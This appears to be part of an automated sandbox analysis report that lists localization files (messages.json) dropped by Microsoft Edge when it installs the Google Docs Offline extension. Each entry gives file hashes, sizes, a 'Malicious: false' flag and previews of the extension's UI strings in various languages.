SHA-512:	3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:	false
Preview:	{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\mr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1719
Entropy (8bit):	4.287702203591075
Encrypted:	false
SSDEEP:	48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:	3B98C4ED8874A160C3789FEAD5553CFA
SHA1:	5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:	ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:	5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\ms\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	936
Entropy (8bit):	4.457879437756106
Encrypted:	false
SSDEEP:	24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:	7D273824B1E22426C033FF5D8D7162B7
SHA1:	EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:	2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:	E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\my\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3830
Entropy (8bit):	3.5483353063347587
Encrypted:	false
SSDEEP:	48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
MD5:	342335A22F1886B8BC92008597326B24
SHA1:	2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:	243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:	CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:	false
Preview:	{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\ne\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1898
Entropy (8bit):	4.187050294267571
Encrypted:	false
SSDEEP:	24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
MD5:	B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:	74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:	E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:	7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.513485418448461
Encrypted:	false
SSDEEP:	12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
MD5:	32DF72F14BE59A9BC9777113A8B21DE6
SHA1:	2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:	F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:	E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\nn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\no\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	878
Entropy (8bit):	4.4541485835627475
Encrypted:	false
SSDEEP:	24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
MD5:	A1744B0F53CCF889955B95108367F9C8
SHA1:	6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:	21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:	F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\pa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	3.839730779948262
Encrypted:	false
SSDEEP:	48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:	97F769F51B83D35C260D1F8CFD7990AF
SHA1:	0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:	BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:	D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:	false
Preview:	{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	978
Entropy (8bit):	4.879137540019932
Encrypted:	false
SSDEEP:	24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
MD5:	B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:	B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:	E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:	266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	907
Entropy (8bit):	4.599411354657937
Encrypted:	false
SSDEEP:	12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
MD5:	608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:	87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:	A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:	82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.604761241355716
Encrypted:	false
SSDEEP:	24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
MD5:	0963F2F3641A62A78B02825F6FA3941C
SHA1:	7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:	E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:	22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	937
Entropy (8bit):	4.686555713975264
Encrypted:	false
SSDEEP:	24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
MD5:	BED8332AB788098D276B448EC2B33351
SHA1:	6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:	085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:	22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1337
Entropy (8bit):	4.69531415794894
Encrypted:	false
SSDEEP:	24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
MD5:	51D34FE303D0C90EE409A2397FCA437D
SHA1:	B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
SHA-256:	BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
SHA-512:	E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\si\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2846
Entropy (8bit):	3.7416822879702547
Encrypted:	false
SSDEEP:	48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
MD5:	B8A4FD612534A171A9A03C1984BB4BDD
SHA1:	F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
SHA-256:	54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
SHA-512:	C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
Malicious:	false
Preview:	{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	4.882122893545996
Encrypted:	false
SSDEEP:	24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
MD5:	8E55817BF7A87052F11FE554A61C52D5
SHA1:	9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
SHA-256:	903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
SHA-512:	EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.6041913416245
Encrypted:	false
SSDEEP:	12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
MD5:	BFAEFEFF32813DF91C56B71B79EC2AF4
SHA1:	F8EDA2B632610972B581724D6B2F9782AC37377B
SHA-256:	AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
SHA-512:	971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.569671329405572
Encrypted:	false
